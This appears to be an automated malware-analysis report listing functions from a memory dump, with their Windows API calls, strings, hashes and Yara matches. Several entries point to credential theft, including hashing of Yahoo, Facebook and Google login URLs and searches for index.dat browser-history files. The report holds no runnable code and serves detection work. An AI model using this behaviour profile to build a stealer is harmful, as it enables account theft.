                                                                                                                                                                  • Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                  • Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
                                                                                                                                                                  • Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A7DA, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                    • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A819
                                                                                                                                                                  • memset.MSVCRT ref: 0040A898
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                                  • String ID: P5@
                                                                                                                                                                  • API String ID: 1960736289-1192260740
                                                                                                                                                                  • Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                  • Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
                                                                                                                                                                  • Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                  • Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416F08, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                    • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                    • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00416F42
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                  • Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                  • Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A37F, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$FileFindFirst
                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                  • API String ID: 1858513025-2863569691
                                                                                                                                                                  • Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                  • Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
                                                                                                                                                                  • Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416E8B, Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                  • Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                  • Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                  • Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004080FD, Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                  • Opcode ID: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
                                                                                                                                                                  • Instruction ID: a19870345f686364ec187dd7d23bdf0954ef371c81d74b5a6631b0975d4c9c24
                                                                                                                                                                  • Opcode Fuzzy Hash: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0927A900328BBDF205B60DC0CFCB377CEF46304F000070B945E6152EA7896888BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004080AC, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • malloc.MSVCRT ref: 004080C8
                                                                                                                                                                  • memcpy.MSVCRT ref: 004080E0
                                                                                                                                                                  • free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                  • Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
                                                                                                                                                                  • Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
                                                                                                                                                                  • Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414C77, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • failed memory resize %u to %u bytes, xrefs: 00414CAE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: realloc
                                                                                                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                  • API String ID: 471065373-2134078882
                                                                                                                                                                  • Opcode ID: 6d5c13ae5ff5f1f73361908e0861040f7e86b36e775a6607f02a377230548c68
                                                                                                                                                                  • Instruction ID: 73c2e8b64515ac6a599151bee48865edbc87acd3c1049f650c7b7cc69a7d2516
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d5c13ae5ff5f1f73361908e0861040f7e86b36e775a6607f02a377230548c68
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF020B3A022026BC2009AA5CC81AC7F39C8FC0720B16082BF948D3200F628E88143EA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040897D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID: CCD
                                                                                                                                                                  • API String ID: 2738559852-662205380
                                                                                                                                                                  • Opcode ID: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
                                                                                                                                                                  • Instruction ID: 69216e87a8676b039392231de9c3b52b74dec2ebcb54b9129181f8e0c6c75afe
                                                                                                                                                                  • Opcode Fuzzy Hash: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CD0C93541020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436ADD, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: d
                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                  • Opcode ID: 581700d0edc2a8117bb5fbd40871278af0e05eb09add98efced60719e19a31a8
                                                                                                                                                                  • Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
                                                                                                                                                                  • Opcode Fuzzy Hash: 581700d0edc2a8117bb5fbd40871278af0e05eb09add98efced60719e19a31a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041E7EE, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset
                                                                                                                                                                  • String ID: BINARY
                                                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                                                  • Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
                                                                                                                                                                  • Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
                                                                                                                                                                  • Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
                                                                                                                                                                  • Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DD37, Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
                                                                                                                                                                    • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90
                                                                                                                                                                    • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                    • Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
                                                                                                                                                                    • Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
                                                                                                                                                                    • Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1161345128-0
                                                                                                                                                                  • Opcode ID: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
                                                                                                                                                                  • Instruction ID: 75199abba107ca30350ead5857dca6b94cadfdfaeaa302ec2f3d27d1e62cce92
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
                                                                                                                                                                  • Instruction Fuzzy Hash: BD417F35E00604EBCB219FA9C885A5EB7B6AF54714F20406FF446AB2D1CB389E44DA99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FE76, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                  • Opcode ID: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
                                                                                                                                                                  • Instruction ID: 2161babe09ea1c109a016804ff5c091d56ac672142073ac0305c405afa28cd18
                                                                                                                                                                  • Opcode Fuzzy Hash: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
                                                                                                                                                                  • Instruction Fuzzy Hash: 37216074B00205AFD714EFAAC881A9DB7A9FF84304F1001BFA415A7782DB79AD148B95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414C1D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 00414C46
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                  • Opcode ID: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
                                                                                                                                                                  • Instruction ID: cc16955a0d14ca8776a7aa5b229d79c98c920de21d1adc6b7d8c4ece6c284845
                                                                                                                                                                  • Opcode Fuzzy Hash: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
                                                                                                                                                                  • Instruction Fuzzy Hash: 64E020B7F0361267C2004615DC0168777959FD132171B0637F95CD3680D63CD84587A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416ED2, Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00416EEB
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1821831730-0
                                                                                                                                                                  • Opcode ID: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
                                                                                                                                                                  • Instruction ID: ddbdeb719d62bbcd0ae2c24f8bc232808eb7cee6ac061654c4d164212cdc0068
                                                                                                                                                                  • Opcode Fuzzy Hash: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0C23F11071A9FDB0097BCDC90AD773D8EF56338726433AF662C61A0CA65D8828654
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041B556, Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                  • Opcode ID: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                  • Instruction ID: 1efd5175aaeb232b83b4fa12f0066e98a2b2c589ef3b7fe000d2c80dadf29316
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                  • Instruction Fuzzy Hash: AF617C71A01245EFDB10EFA485C06EEB7B4FB54308F14846FE11497281E738AED59B9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406186, Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  • memcpy.MSVCRT ref: 00406335
                                                                                                                                                                  • memcpy.MSVCRT ref: 00406386
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$??2@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3700833809-0
                                                                                                                                                                  • Opcode ID: 402acb6376f6539cd8a616ca3a3e7298464c0b640249808cfbb2ffa3643909e2
                                                                                                                                                                  • Instruction ID: 8a3562f1281074609f41a4a0f252eb3b484c2fe65b7db80ae4ef97e7bc175081
                                                                                                                                                                  • Opcode Fuzzy Hash: 402acb6376f6539cd8a616ca3a3e7298464c0b640249808cfbb2ffa3643909e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F710671900219EBCF04EFA9D490AEEB7B5FF48304F10802EF916B7281D7789951CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041857E, Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                  • Opcode ID: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
                                                                                                                                                                  • Instruction ID: 158bf94f573ecacca79ccaf447c09fb498ee4e42fef6769a8b2fd70c0d8b82a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D417A72500602EFCB309F64D9848ABB7F6FB14314710492FE54AC7660EB38E9D5CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004109C4, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
                                                                                                                                                                    • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
                                                                                                                                                                    • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
                                                                                                                                                                    • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
                                                                                                                                                                    • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22
                                                                                                                                                                    • Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
                                                                                                                                                                    • Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
                                                                                                                                                                    • Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF
                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4204647287-0
                                                                                                                                                                  • Opcode ID: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                  • Instruction ID: e327927a43c347593f183825775ae13c5bf460ea87da421573a566f28fb83fb7
                                                                                                                                                                  • Opcode Fuzzy Hash: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A117076C00218EBCF11EBA5DA419DEB7B9EF44300F10006BE441F3281EA749B84CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004057D2, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                  • Opcode ID: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                  • Instruction ID: 10cf5b1db118189887eacc4ff35e91e25d6bd08443c232d43c4ae27a9a01ea3e
                                                                                                                                                                  • Opcode Fuzzy Hash: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                  • Instruction Fuzzy Hash: FBE0C776100100FFE620AF08CC06F2BBBF8EFC4B00F10882EB2C49A0B5C6326812CB25
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413E1E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00413E45
                                                                                                                                                                    • Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
                                                                                                                                                                    • Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
                                                                                                                                                                    • Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4232544981-0
